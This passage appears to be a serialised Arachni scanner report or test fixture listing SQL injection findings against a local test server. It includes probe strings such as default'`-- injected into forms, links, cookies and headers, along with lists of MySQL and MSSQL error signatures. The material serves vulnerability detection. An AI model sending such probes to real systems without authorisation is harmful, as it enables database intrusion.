    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:supplied argument is not a valid MySQL)
      :match: supplied argument is not a valid MySQL
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: form
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/mysql/form/append
      :verification: false
      :id: supplied argument is not a valid MySQL
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:supplied argument is not a valid MySQL)
    regexp_match: supplied argument is not a valid MySQL
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      supplied argument is not a valid MySQL
      Column count doesn't match value count at row
      mysql_fetch_array()
      on MySQL result index
      You have an error in your SQL syntax;
      You have an error in your SQL syntax near
      MySQL server version for the right syntax to use
      [MySQL][ODBC
      Column count doesn't match
      Table 'Stuff' doesn't exist
      SQL syntax stuff MySQL
      Warning stuff mysql_
      valid MySQL result

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mysql/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mysql/link/flip?input=default
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid MySQL
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:supplied argument is not a valid MySQL)
      :match: supplied argument is not a valid MySQL
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: link
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/mysql/link/flip?input=default
      :verification: false
      :id: supplied argument is not a valid MySQL
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:supplied argument is not a valid MySQL)
    regexp_match: supplied argument is not a valid MySQL
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"supplied argument is not a valid MySQL\\nColumn count doesn't match value count at row\\nmysql_fetch_array()\\non MySQL result index\\nYou have an error in your SQL syntax;\\nYou have an error in your SQL syntax near\\nMySQL server version for the right syntax to use\\n[MySQL][ODBC\\nColumn count doesn't match\\nTable 'Stuff' doesn't exist\\nSQL syntax stuff MySQL\\nWarning stuff mysql_\\nvalid MySQL result\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mysql/link/flip?input=default
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mysql/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "387"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid MySQL
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:supplied argument is not a valid MySQL)
      :match: supplied argument is not a valid MySQL
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: link
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/mysql/link/append?input=default
      :verification: false
      :id: supplied argument is not a valid MySQL
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:supplied argument is not a valid MySQL)
    regexp_match: supplied argument is not a valid MySQL
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      supplied argument is not a valid MySQL
      Column count doesn't match value count at row
      mysql_fetch_array()
      on MySQL result index
      You have an error in your SQL syntax;
      You have an error in your SQL syntax near
      MySQL server version for the right syntax to use
      [MySQL][ODBC
      Column count doesn't match
      Table 'Stuff' doesn't exist
      SQL syntax stuff MySQL
      Warning stuff mysql_
      valid MySQL result

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mysql/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mysql/cookie/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;)=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid MySQL
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:supplied argument is not a valid MySQL)
      :match: supplied argument is not a valid MySQL
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: )
      :altered: Parameter flip
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        ): 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        ): 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/mysql/cookie/flip
      :verification: false
      :id: supplied argument is not a valid MySQL
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:supplied argument is not a valid MySQL)
    regexp_match: supplied argument is not a valid MySQL
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, \"supplied argument is not a valid MySQL\\nColumn count doesn't match value count at row\\nmysql_fetch_array()\\non MySQL result index\\nYou have an error in your SQL syntax;\\nYou have an error in your SQL syntax near\\nMySQL server version for the right syntax to use\\n[MySQL][ODBC\\nColumn count doesn't match\\nTable 'Stuff' doesn't exist\\nSQL syntax stuff MySQL\\nWarning stuff mysql_\\nvalid MySQL result\\n\"]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mysql/cookie/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mysql/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value)
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "387"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid MySQL
    injected: cookie value)
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:supplied argument is not a valid MySQL)
      :match: supplied argument is not a valid MySQL
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: )
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value)
      :injected: cookie value)
      :combo: 
        cookie2: cookie value)
      :action: http://localhost:7842/mysql/cookie/append
      :verification: false
      :id: supplied argument is not a valid MySQL
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:supplied argument is not a valid MySQL)
    regexp_match: supplied argument is not a valid MySQL
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      supplied argument is not a valid MySQL
      Column count doesn't match value count at row
      mysql_fetch_array()
      on MySQL result index
      You have an error in your SQL syntax;
      You have an error in your SQL syntax near
      MySQL server version for the right syntax to use
      [MySQL][ODBC
      Column count doesn't match
      Table 'Stuff' doesn't exist
      SQL syntax stuff MySQL
      Warning stuff mysql_
      valid MySQL result

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mysql/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mysql/header/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "559"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid MySQL
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:supplied argument is not a valid MySQL)
      :match: supplied argument is not a valid MySQL
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/mysql/header/flip
      :verification: false
      :id: supplied argument is not a valid MySQL
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:supplied argument is not a valid MySQL)
    regexp_match: supplied argument is not a valid MySQL
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, \"supplied argument is not a valid MySQL\\nColumn count doesn't match value count at row\\nmysql_fetch_array()\\non MySQL result index\\nYou have an error in your SQL syntax;\\nYou have an error in your SQL syntax near\\nMySQL server version for the right syntax to use\\n[MySQL][ODBC\\nColumn count doesn't match\\nTable 'Stuff' doesn't exist\\nSQL syntax stuff MySQL\\nWarning stuff mysql_\\nvalid MySQL result\\n\", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mysql/header/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mysql/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'`--
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "387"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: supplied argument is not a valid MySQL
    injected: arachni_user'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:supplied argument is not a valid MySQL)
      :match: supplied argument is not a valid MySQL
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'`--
      :injected: arachni_user'`--
      :combo: 
        User-Agent: arachni_user'`--
      :action: http://localhost:7842/mysql/header/append
      :verification: false
      :id: supplied argument is not a valid MySQL
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:supplied argument is not a valid MySQL)
    regexp_match: supplied argument is not a valid MySQL
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      supplied argument is not a valid MySQL
      Column count doesn't match value count at row
      mysql_fetch_array()
      on MySQL result index
      You have an error in your SQL syntax;
      You have an error in your SQL syntax near
      MySQL server version for the right syntax to use
      [MySQL][ODBC
      Column count doesn't match
      Table 'Stuff' doesn't exist
      SQL syntax stuff MySQL
      Warning stuff mysql_
      valid MySQL result

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mysql/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mssql/form/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "884"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: System.Data.OleDb.OleDbException
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
      :match: System.Data.OleDb.OleDbException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: form
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/mssql/form/flip
      :verification: false
      :id: System.Data.OleDb.OleDbException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
    regexp_match: System.Data.OleDb.OleDbException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"System.Data.OleDb.OleDbException\\n[Microsoft][ODBC SQL Server Driver]\\n[SQLServer JDBC Driver]\\n[SqlException\\nSystem.Data.SqlClient.SqlException\\nUnclosed quotation mark after the character string\\n'80040e14'\\nmssql_query()\\nMicrosoft OLE DB Provider for ODBC Drivers\\nMicrosoft OLE DB Provider for SQL Server\\nIncorrect syntax near\\nSintaxis incorrecta cerca de\\nSyntax error in string in query expression\\nProcedure or function 'ColumnSeek' expects parameter\\nUnclosed quotation mark before the character string\\nSyntax Error (missing operator) in query expression\\nData type mismatch in criteria expression\\nADODB.Field (0x800A0BCD)\\n[Microsoft][ODBC Microsoft Access Driver]\\nthe used select statements have different number of columns\\nOLE DB stuff SQL Server\\nWarningstuff mssql_\\nAccess stuff Driver\\nDriver stuff Access\\nJET Database Engine\\nAccess Database Engine\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mssql/form/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mssql/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "849"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: System.Data.OleDb.OleDbException
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
      :match: System.Data.OleDb.OleDbException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: form
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/mssql/form/append
      :verification: false
      :id: System.Data.OleDb.OleDbException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
    regexp_match: System.Data.OleDb.OleDbException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      System.Data.OleDb.OleDbException
      [Microsoft][ODBC SQL Server Driver]
      [SQLServer JDBC Driver]
      [SqlException
      System.Data.SqlClient.SqlException
      Unclosed quotation mark after the character string
      '80040e14'
      mssql_query()
      Microsoft OLE DB Provider for ODBC Drivers
      Microsoft OLE DB Provider for SQL Server
      Incorrect syntax near
      Sintaxis incorrecta cerca de
      Syntax error in string in query expression
      Procedure or function 'ColumnSeek' expects parameter
      Unclosed quotation mark before the character string
      Syntax Error (missing operator) in query expression
      Data type mismatch in criteria expression
      ADODB.Field (0x800A0BCD)
      [Microsoft][ODBC Microsoft Access Driver]
      the used select statements have different number of columns
      OLE DB stuff SQL Server
      Warningstuff mssql_
      Access stuff Driver
      Driver stuff Access
      JET Database Engine
      Access Database Engine

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mssql/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mssql/link/flip?input=default
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
